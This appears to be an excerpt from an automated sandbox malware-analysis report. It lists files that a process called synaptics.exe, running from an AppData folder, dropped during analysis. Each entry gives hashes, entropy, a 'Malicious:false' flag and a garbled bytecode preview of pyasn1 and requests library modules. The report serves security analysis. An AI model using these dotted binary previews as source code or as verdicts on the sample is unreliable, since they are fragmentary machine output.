                                                                                                                                                                                                            Entropy (8bit):5.1458284017483
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:v7bLr4jGns+GAwQvrrmPzKJzXzr72xL2LWHbIGpwhShNC4nxxrWqYx5qiwd:Ajcs+GAwQTrmGh2xgWHkGOkhVnxxrahY
                                                                                                                                                                                                            MD5:B20B3C4CC2F80C3CE76247AACA98A0E1
                                                                                                                                                                                                            SHA1:BCB6095D69665D8CB7F4EC3BD538D47FDE465753
                                                                                                                                                                                                            SHA-256:285FB8B2F979AA4CB7DC7DADB12124116DE7928E971D9F78CDC7476E0C474D34
                                                                                                                                                                                                            SHA-512:ED88FAABCBCD3FDC492736BBEA7AE010F349D031B68D86A98D498D4CD37E63EA43895648A10C3095BFB03A3726075F6C8D7B94E3039CD94756B1B54E82EDFF9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g#........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..NamedValuesc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,S.)-r....a....Create named values object... The |NamedValues| object represents a collection of string names. associated with numeric IDs. These objects are used for giving. names to otherwise numerical values... |NamedValues| objects are immutable and duck-type Python. :class:`dict` object mapping ID to name and vice-versa... Parameters. ----------. *args: variable number of two-element :py:class:`tuple`.. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric value.. Keyword Args. ------------. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric valu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10203
                                                                                                                                                                                                            Entropy (8bit):5.028037688304681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:cOjGsnVvD7K+qqlTckRWnzSO4U/KNrNr2RPb0qn:THnVb7/HRWnZ4U/xb0q
                                                                                                                                                                                                            MD5:D270AFB7648E3136FC94D13F7097C82B
                                                                                                                                                                                                            SHA1:09E046D61C77257B51A5F1A05F1585D629D984FC
                                                                                                                                                                                                            SHA-256:37EBFFB7B0E93DCC5F0E6456032F7ADF4FB0F6122C3DCF7E4A81D991DB77671A
                                                                                                                                                                                                            SHA-512:471BFB7F0CA3BBB4F4F65D7167DABFD09A811AEE51CC51F0FC44F437C0173F3A210A0A20D0F1EA51096D1E6B4AB1E9757678DA2F661E3CAB83407CCB6C783290
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.%.......................@...sd...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...error)...tagClassUniversal..tagClassApplication..tagClassContext..tagClassPrivate..tagFormatSimple..tagFormatConstructed..tagCategoryImplicit..tagCategoryExplicit..tagCategoryUntagged..Tag..TagSet.@............. ..................c....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d d!....Z.d"S.)#r....a....Create ASN.1 tag.. Represents ASN.1 tag that can be attached to a ASN.1 type to make. types distinguishable from each other... *Tag* objects are immutable and duck-type Python :class:`tuple` objects. holding three integer components of a tag... Parameters. ----------. tagClass: :py:class:`int`. Tag *class* value.. tagFormat: :py:class:`int`. Tag *format* value.. tagId: :
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3303
                                                                                                                                                                                                            Entropy (8bit):5.139589165853379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:L7uO+EKaC/KIO00QLMmp6ygzg43BYEASd9uh9DYCfCEfXn+KZm667D0Kv19HpqEo:Ot0P0oygTxYwfuh9DYlaO+6HNvXHpqEo
                                                                                                                                                                                                            MD5:4E626BAF6EE84EB8FF5D7DF86D374F17
                                                                                                                                                                                                            SHA1:A7CFBC3CB10E143E11DD421E4BDAFB3AD887CEA3
                                                                                                                                                                                                            SHA-256:58373FC9E3B14358A556EB804CED834D0A7810B2908927B8D0F9F49570B5C439
                                                                                                                                                                                                            SHA-512:5C50E7643D1E5AEB2C487B8137962B00E07E8C6EE837DE8F930CF143B7BF0183829B7549A5AC0C9477831955F5AA76DE1C76F4FCDA365E1F1E1ECE5FAFA87D87
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..TagMapc....................@...sv...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....aF...Map *TagSet* objects to ASN.1 types.. Create an object mapping *TagSet* object to ASN.1 type... *TagMap* objects are immutable and duck-type read-only Python. :class:`dict` objects holding *TagSet* objects as keys and ASN.1. type objects as values... Parameters. ----------. presentTypes: :py:class:`dict`. Map of :class:`~pyasn1.type.tag.TagSet` to ASN.1 objects considered. as being unconditionally present in the *TagMap*... skipTypes: :py:class:`dict`. A collection of :class:`~pyasn1.type.tag.TagSet` objects considered. as absent in the *TagMap* even when *defaultType* is present... defaultType: ASN.1 type object. An ASN.1 type object callee *TagMap* returns for
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93776
                                                                                                                                                                                                            Entropy (8bit):5.299615220922268
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SltBPPmHi1lw8zdxtKNaRdsSxRQxZvzEIAYWTJdqH/uN6xjjQT/8kKXDlCydymtD:Snw8pxtKNaRdsSxRQxZvzEIAYWTJdqH1
                                                                                                                                                                                                            MD5:CAA00F3DA25049F4E283AF1787C313DA
                                                                                                                                                                                                            SHA1:C460A489C4F825F64DFDEBCE05EC7EE62E668148
                                                                                                                                                                                                            SHA-256:4335232CA99B518419DCEA2E801991382773FCB0FAAABED2F34C6DCAA16BD86E
                                                                                                                                                                                                            SHA-512:E2FBC2CEA1382BF46BEB6A32402408FE75382F3E3C24FCE003DB8165762303908DD560490B59745C510155C70E441EA6845049E53A91297881877A5D3B0B6F97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.e...Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z G.d$d%..d%e...Z!G.d&d'..d'e.j...Z"G.d(d)..d)e"..Z#G.d*d+..d+e"..Z$G.d,d-..d-e$..Z%G.d.d/..d/e...Z&d.S.)0.....N)...error)...eoo)...integer)...base)...constraint)...namedtype)...namedval)...tag)...tagmap)...Integer..Boolean..BitString..OctetString..Null..ObjectIdentifier..Real..Enumerated..SequenceOfAndSetOfBase..SequenceOf..SetOf..SequenceAndSetBase..Sequence..Set..Choice..Any..NoValue..noValuec....................@...s....e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.e.....Z.e.....Z.e.j.....Z.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4406
                                                                                                                                                                                                            Entropy (8bit):5.428978975612528
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JHaqgsRPefkBzr3Acd0XPSWhXgxTdeqTALFI8WoTFfI7YHpiZA:YTeIklA00/Sc6nTgFIDoJg7YHJ
                                                                                                                                                                                                            MD5:783DF0BBF8DE7DD9462C9AB495762318
                                                                                                                                                                                                            SHA1:1CEA29086D7D8B38F0EB102D756C89973A41488B
                                                                                                                                                                                                            SHA-256:BDF49E173B3E8078C671310DA6ECFE7B8DAAECC7F4BFF4BE330A1C31F18591B7
                                                                                                                                                                                                            SHA-512:4F945427C006379968CB3F4F9E5807A1164478893F0CFE0D101B10EAD3912F13A7EE4AD278C0867A2F52164832E2178F8EBC885802E08EF1EC671239CED9BF5E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.d.S.)......N)...error)...char)...tag)...univ)...ObjectDescriptor..GeneralizedTime..UTCTimec....................@...s:...e.Z.d.Z.e.j.j.Z.e.j.j...e...e.j.e.j.d.....Z.e.j.....Z.d.S.).r.........N)...__name__..__module__..__qualname__r......GraphicString..__doc__..tagSet..tagImplicitlyr......Tag..tagClassUniversal..tagFormatSimple..getTypeId..typeId..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\useful.pyr........s................r....c....................@...sL...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.e...Z.e.d.d.....Z.e.d.d.....Z.d.S.)...TimeMixIn.....Fc....................@...s2...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.TimeMixIn.FixedOffsetz&Fixed offset in minutes east from UTC.r......UTCc....................C...s....t.j.|.d...|._.|.|._.d.S.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3915
                                                                                                                                                                                                            Entropy (8bit):5.7922299119497636
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1qPoGNOeYVGivMhhFJQlIgSdAhoppVaxdses42WQXIBmPriV7:sP8MhqKgSehXdFQYBJh
                                                                                                                                                                                                            MD5:E3BD79C234F0E8B7142FAA427A23CBD4
                                                                                                                                                                                                            SHA1:047C8440706107151C75B7C0061E745E5A8928A9
                                                                                                                                                                                                            SHA-256:948B65F2D2B7CD1D387FB2EA13D709123FFDE86062E2AE98E117EEE1DCCE4823
                                                                                                                                                                                                            SHA-512:FF38CB46D3FED655FAF44449EA5DD592CFE61112A91E8DABCE7AE810F4AF8CF654ADC414B2BF56219B4745166A4C1156280D14FDC72BBCFD255FBED91B4FE410
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):529
                                                                                                                                                                                                            Entropy (8bit):5.564980784435289
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CBUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcgfsZRm7hooookk:OxdOyqmsvBF5McAFAu6pgfa4ek
                                                                                                                                                                                                            MD5:7756C497C6698854C43BD2DC92934FAB
                                                                                                                                                                                                            SHA1:592E1DC20D041C742C769F49157FE533920CCFA3
                                                                                                                                                                                                            SHA-256:D589D4BB639C952B3268689FCAEBD32D5CF13A1F9AE9CC8447CBC0014E60BC9B
                                                                                                                                                                                                            SHA-512:EB5D14F2EE8E63BF75EDDC3E728B38F9A3992FAF940768363E09EBDAF6477B83F5D024C65370AEE5CB840855AAC9749CB3D6D0DE6CDCFBBDE6FFB5FEDADCBEE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1605
                                                                                                                                                                                                            Entropy (8bit):5.659880454467634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:NUBWAmpGWydoNxLbircr1OlX4Ja8me5Q+:N0j95+nbtpYqa8me5Q+
                                                                                                                                                                                                            MD5:A6C07B2B4AB0E760315F5D53180F7E32
                                                                                                                                                                                                            SHA1:2D795865861DFFD04301B96BF418960DE3D51C3D
                                                                                                                                                                                                            SHA-256:D28BC72933CAE9EE76E274BE20DD399654E96512FA0D3DB8A67F9FB6E90495B9
                                                                                                                                                                                                            SHA-512:65411ED86173268867A20DDCF068EBDBC1B889B136526A1F962674BEB08C6C5696B32BEDA4E501A2BDF81254C3080B23D6332C0B309A49252DB0460E89235668
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determin
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22019
                                                                                                                                                                                                            Entropy (8bit):5.43172862951124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RmMUzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:00TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                            MD5:6BC9E5F061C7D88C28BD0FDAB822CA5B
                                                                                                                                                                                                            SHA1:768AEDB4354EEAF6920B215E5F08944BD8C83CE5
                                                                                                                                                                                                            SHA-256:F34D5C9E55EA8EB703EA4ECDCC93D73E74176C769ABD275286E1CD886706941F
                                                                                                                                                                                                            SHA-512:B6C18F37A582DBF485518C904E5BFB092B57E355E57354F947465AEF723900AE3BA445BDB25569342244749237195E2CC8218C8FCBEE12E722D167329581F4C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6705
                                                                                                                                                                                                            Entropy (8bit):5.146262477030171
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:t4kMfrO7AyGLluXW87ZolNAzj8t8vYat9DMGm6RGmOsGmfiC:rMDY7EeZjM8WeRys2C
                                                                                                                                                                                                            MD5:EB19B3892CAF72AF48C850BD8AEA7D10
                                                                                                                                                                                                            SHA1:A029B66EEF17E11C6885E14B61E351165FB698A5
                                                                                                                                                                                                            SHA-256:7807C23420A26734A8127DF5D0E0086B28B2EF044A43A6812FABEE60C76D023B
                                                                                                                                                                                                            SHA-512:AC6348C5315BF73CF6DB8EC547AED1C740C47E119F1FE47246F3720F5A5E39977218137C378ABF125B45F522F2B4537DE5A25FC40C8824A661EA1814700772AF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8101
                                                                                                                                                                                                            Entropy (8bit):5.490199182203775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4B0/m1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:w0/m1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                            MD5:67E5394C1A019C94C510EEF5D7CE9452
                                                                                                                                                                                                            SHA1:9D8D7C82CB171EAA0D37A6BC0532911DF7CE4CD2
                                                                                                                                                                                                            SHA-256:A987079B2EA9F767488FA3DE626057E39BCF4E748268885F7188864340AE782B
                                                                                                                                                                                                            SHA-512:432CDC580586382B9F23FE4EAD677EA19A755135CFA6E417B89E494CD3AE865042BBF4494915ADFD706B119D56D3332ACF3F8D2C0A06D1D32D382E30AD515E64
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):606
                                                                                                                                                                                                            Entropy (8bit):5.313634149400393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CYOBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01v8pfsZRUcENM:LgbXKAhwa93DRCUfaZ
                                                                                                                                                                                                            MD5:1A82A8D622E3917CCC994A0A52D9275F
                                                                                                                                                                                                            SHA1:775D4ED1BB17414AC1D7CE2A2A55F5C4390918EB
                                                                                                                                                                                                            SHA-256:67BCAA8EC5EB28295CA2FD367358DCD7C0EC3345800064E298E47B53CC8C73CD
                                                                                                                                                                                                            SHA-512:62747153294BA2A23315E1813566EC5078647DD42EAE5EC78B17342D20AC0B34DE451AFA4079771EF1E2D9CBD4EA0726F1877577AAA6BF9D0EA200E673144FEC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1757
                                                                                                                                                                                                            Entropy (8bit):5.606899048783056
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6AUIkbGXHyOLyRJV79pWlKPV+5MTYGi4k0b8+:6R8XyUyRJJ9wKPV+5f4kI
                                                                                                                                                                                                            MD5:5D2CFAFBC5F5542CB544F36AB629C083
                                                                                                                                                                                                            SHA1:CDE8998A5D9AAD8C305495413DD652E5DB4F370F
                                                                                                                                                                                                            SHA-256:03A9192B112C6A8C143AA2EE084473DB1CF1A5D0E41D413F89D01178B3A355F3
                                                                                                                                                                                                            SHA-512:27BCAC53562649D1734A78DA6611EED0D1D690925FBB066961F165C9E42913DBA4410C399E22B4FCF62CBEBDC9EDA3703EAEFD7664E3BA989430BDE6A898A879
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18700
                                                                                                                                                                                                            Entropy (8bit):5.258954351347999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mEvXhqn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:mEvXhqn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                            MD5:CBDD940A31874A9D6A9A051F1EDBA6E0
                                                                                                                                                                                                            SHA1:0F052DA4223211A8C7D32CCBFC0A498C09ECEFBE
                                                                                                                                                                                                            SHA-256:306DC613F41410FDFC8E48C9BE6DEBCE654FE63E5A50C9BA3466006E07D2E31E
                                                                                                                                                                                                            SHA-512:56E8D0923C37D6AF956CBAC05744374C4024E40EA517203B354E58CA1B876A54341EF40D1EA8EBF03245A2FF2A320FB854CD6F1E98BB5E42C32515FF8C3E25CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
